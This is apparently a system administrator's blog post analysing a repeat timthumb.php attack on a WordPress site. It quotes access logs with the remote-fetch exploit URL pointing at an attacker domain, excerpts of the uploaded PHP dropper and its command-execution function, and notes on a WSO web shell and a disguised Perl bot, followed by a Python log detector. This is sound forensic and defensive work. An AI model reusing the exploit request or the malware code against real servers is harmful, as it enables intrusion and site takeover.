Update on the timthumb Wordpress hack - it happened again!


Listed in: Linux, PHP, Internet, Hacks


Earlier this week I already wrote an article about the timthumb.php vulnerability, which lets an attacker make timthumb fetch a remote PHP file into its cache directory on a Wordpress blog, where the web server then executes it.

Last time the hack took me by surprise; this time I was prepared. I had set up special monitoring for new processes, and tonight the trap worked. At 20:06 a fake process was started as www-data:

# ps auxf | grep www
root     16995  0.0  0.0  87856   716 pts/0    S+   21:00   0:00                      \_ grep www
www-data  7170  0.0  0.9 225316 40088 ?        S    14:06   0:00  \_ /usr/sbin/apache2 -k start
www-data 29483 14.5 10.4 1049984 419648 ?      Sl   17:37  29:36  \_ /usr/sbin/apache2 -k start
www-data  2594 14.3  9.0 1022848 366568 ?      Sl   18:30  21:24  \_ /usr/sbin/apache2 -k start
www-data  6318 11.5  9.0 1088992 364764 ?      Sl   19:13  12:19  \_ /usr/sbin/apache2 -k start
www-data 11256  0.0  0.0      0     0 ?        Z    20:06   0:00      \_ [sh]
www-data 11260 97.5  0.1  24592  5336 ?        R    20:06  52:26 /usr/sbin/httpd

The giveaway is in the listing: the real Apache workers run as /usr/sbin/apache2 -k start under the root master process, while the new process calls itself /usr/sbin/httpd, is not part of the Apache process tree (its sh parent is already a zombie) and is burning 97% CPU. A quick search of the access logs turned up the following entries:

184.73.160.230 - - [12/Nov/2011:20:06:23 +0100] "GET / HTTP/1.1" 200 31358 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:27 +0100] "GET /wp-content/themes/DeepFocus/timthumb.php?src=http://picasa.com.thomaswdufour.com/patcherfinal.php HTTP/1.1" 400 582 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

184.73.160.230 - - [12/Nov/2011:20:06:29 +0100] "GET /wp-content/themes/DeepFocus/cache/external_dba6868eba22b3fabd3e54b8a29071ef.php?act=uname HTTP/1.1" 200 139 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:39 +0100] "GET /wp-content/themes/DeepFocus/cache/external_dba6868eba22b3fabd3e54b8a29071ef.php?act=backup HTTP/1.1" 200 66 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:39 +0100] "GET /wp-content/themes/DeepFocus/cache/external_dba6868eba22b3fabd3e54b8a29071ef.php?act=check HTTP/1.1" 200 135 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:39 +0100] "GET /wp-content/themes/DeepFocus/inc.php HTTP/1.1" 200 126 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:40 +0100] "GET /wp-content/themes/DeepFocus/cache/external_dba6868eba22b3fabd3e54b8a29071ef.php?act=patch HTTP/1.1" 200 63 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

As soon as I saw timthumb.php in the log, I knew which hack it was. The hostname picasa.com.thomaswdufour.com is not an accident: it contains picasa.com, one of the external sites that vulnerable timthumb versions allow by default, and the domain check only looked for that string in the hostname, so the remote fetch was let through. But this time it was a little different. Last time only a single command was executed and the uploaded PHP file was rather small. This time the PHP file fetched from http://picasa.com.thomaswdufour.com/patcherfinal.php was rather big and even creates new sockets.

The file again starts with a GIF89a image header followed by junk bytes, so that timthumb accepts the download as an image, and then the PHP code begins:

GIF89a????????!?????,???????D?;?// Coded [c] 2011 by v0ld3m0rt
// Unknown Indonesian H4xx0r
error_reporting(0);
$uname = php_uname();
$htaccess = "PEZpbGVzIH4gIlwuKHBocHxwaHAzfGNnaXxwaHA0fHBocDUpJCI+DQogIGRlbnkgZnJvbSBhbGwNCjwvRmlsZXM+";
$data = "PD9waHANCi8qIFdTTyAyLjEgKFdlYiBTaGVsbCBieSBvUmIpICovDQppZighZmlsZV9leGlzdH....

Decoding the two base64 strings shows what the "patcher" in the file name means: $htaccess is a <Files ~ "\.(php|php3|cgi|php4|php5)$"> deny from all block, i.e. an .htaccess that locks other attackers out of the cache directory, and $data begins with <?php /* WSO 2.1 (Web Shell by oRb) */, the web shell that turns up again further down. But the more interesting part comes at the end:

function ex($in) {
        $out = '';
        if(function_exists('exec')) {
                @exec($in,$out);
                $out = @join("\n",$out);
        }elseif(function_exists('passthru')) {
                ob_start();
                @passthru($in);
                $out = ob_get_clean();
        }elseif(function_exists('system')) {
                ob_start();
                @system($in);
                $out = ob_get_clean();
        }elseif(function_exists('shell_exec')) {
                $out = shell_exec($in);
        }elseif(is_resource($f = @popen($in,"r"))) {
                $out = "";
                while(!@feof($f))
                        $out .= fread($f,1024);
                pclose($f);
        }
        return $out;
}

function CreateFile($path, $content)
{
        $handle = fopen($path, "a+");
        fwrite($handle, $content);
        fclose($handle);
}

You can take a look at the full file here: external_patcherfinal.txt

The PHP script lets the attacker execute commands on the server via the functions passthru, system and shell_exec. Those functions are disabled on my server.
However, ex() falls back to popen, which was not disabled, so a forked command (in this case a bot) could still be launched, and it was, right after the upload:

184.73.160.230 - - [12/Nov/2011:20:06:29 +0100] "GET /wp-content/themes/DeepFocus/cache/external_dba6868eba22b3fabd3e54b8a29071ef.php?act=infect&bot=[somebinarycode] HTTP/1.1" 200 49 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
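As an added example (not code from the original post), here is detection logic for exactly this sequence, run over the access-log lines quoted above, both the earlier block and the act=infect line. The sample log is constructed from those lines with the User-Agent trimmed and one benign timthumb request added so the detector has something to ignore. It parses the combined log format, tags timthumb requests whose src= is an absolute URL, tags any PHP executed from a theme cache directory, and raises an alert when the same client IP does the second within ten minutes of the first. The regexes, the cache-path pattern and the ten-minute window are my assumptions, not anything timthumb or Wordpress defines.

```python
import re
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Constructed sample: the access-log lines quoted in the post (User-Agent
# trimmed), plus a benign local timthumb resize request from another client.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Nov/2011:19:58:02 +0100] "GET /wp-content/themes/DeepFocus/timthumb.php?src=wp-content/uploads/photo.jpg&w=150 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
184.73.160.230 - - [12/Nov/2011:20:06:23 +0100] "GET / HTTP/1.1" 200 31358 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:27 +0100] "GET /wp-content/themes/DeepFocus/timthumb.php?src=http://picasa.com.thomaswdufour.com/patcherfinal.php HTTP/1.1" 400 582 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:29 +0100] "GET /wp-content/themes/DeepFocus/cache/external_dba6868eba22b3fabd3e54b8a29071ef.php?act=uname HTTP/1.1" 200 139 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:29 +0100] "GET /wp-content/themes/DeepFocus/cache/external_dba6868eba22b3fabd3e54b8a29071ef.php?act=infect&bot=[somebinarycode] HTTP/1.1" 200 49 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:39 +0100] "GET /wp-content/themes/DeepFocus/inc.php HTTP/1.1" 200 126 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:40 +0100] "GET /wp-content/themes/DeepFocus/cache/external_dba6868eba22b3fabd3e54b8a29071ef.php?act=patch HTTP/1.1" 200 63 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/3.6"
"""

# Apache "combined" log format, up to the response size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
TIMTHUMB_RE = re.compile(r"/timthumb\.php$", re.I)
# Assumption: nothing legitimate ever executes PHP from a theme's cache dir.
CACHE_PHP_RE = re.compile(r"/wp-content/.*/cache/[^/]+\.php$", re.I)


def parse_line(line: str) -> Optional[Dict]:
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    req = m.groupdict()
    req["ts"] = datetime.strptime(req["ts"], "%d/%b/%Y:%H:%M:%S %z")
    req["status"] = int(req["status"])
    url = urlsplit(req["target"])
    req["path"] = url.path
    req["query"] = {k: v[0] for k, v in parse_qs(url.query, keep_blank_values=True).items()}
    return req


def classify(req: Dict) -> Optional[str]:
    """Tag a request as a timthumb remote fetch or cache-dir PHP execution."""
    if TIMTHUMB_RE.search(req["path"]):
        src = req["query"].get("src", "")
        if re.match(r"^https?://", src, re.I):
            host = urlsplit(src).hostname or "?"
            # Keyed on the URL, not the status: the fetch above returned 400
            # and the dropped file was executed two seconds later anyway.
            return "timthumb remote fetch from %s (status %d)" % (host, req["status"])
        return None  # local src= is what timthumb is for
    if CACHE_PHP_RE.search(req["path"]):
        return "PHP executed from theme cache dir, act=%s" % req["query"].get("act", "-")
    return None


def detect(log_text: str, window: timedelta = timedelta(minutes=10)) -> Tuple[List, List]:
    """Return (tagged events, alerts).

    An alert is raised when a client executes PHP from a cache directory
    within `window` of its own remote timthumb fetch.
    """
    events, alerts, last_fetch = [], [], {}
    for line in log_text.splitlines():
        req = parse_line(line)
        if req is None:
            continue
        tag = classify(req)
        if tag is None:
            continue
        events.append((req["ip"], req["ts"], tag))
        if tag.startswith("timthumb remote fetch"):
            last_fetch[req["ip"]] = req["ts"]
        elif req["ip"] in last_fetch and req["ts"] - last_fetch[req["ip"]] <= window:
            alerts.append((req["ip"], req["path"], req["query"].get("act", "-")))
    return events, alerts


if __name__ == "__main__":
    for ip, path, act in detect(SAMPLE_LOG)[1]:
        print("ALERT %s executed %s (act=%s)" % (ip, path, act))
```

On a real server, `detect(open("/var/log/apache2/access.log").read())` is enough for a nightly sweep; the remote-fetch tag alone is worth alerting on, since a legitimate src= should never point at a .php URL. The inc.php request is not caught by these two rules, which is a reminder that the cache directory is only the attacker's first foothold.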

It doesn't stop there. As the access log shows, another file, inc.php, was requested as well. Opened in a browser it looks like this:

[Screenshot: Timthumb Hack - web shell uploaded]

The file starts with the following code:

/* WSO 2.1 (Web Shell by oRb) */
if(!file_exists("data.php")) {
        WriteData();

So a PHP web shell was uploaded. To take a look at it, I modified its password function:

[Screenshot: WSO web shell]

Through this web shell, further files can be uploaded, executed, overwritten, and so on.

Two more files were found: data.php in the same directory, and a file called 'sex' in the cache folder. The 'sex' file was actually a Perl script, most probably started through the web shell, and it is the source of the fake Apache process discovered at the start: a Perl script can give itself any name in the process list by assigning to $0, which is why it showed up as /usr/sbin/httpd. /proc/<pid>/exe still points at the real interpreter, so comparing that link with the process name is a reliable way to unmask such a process.

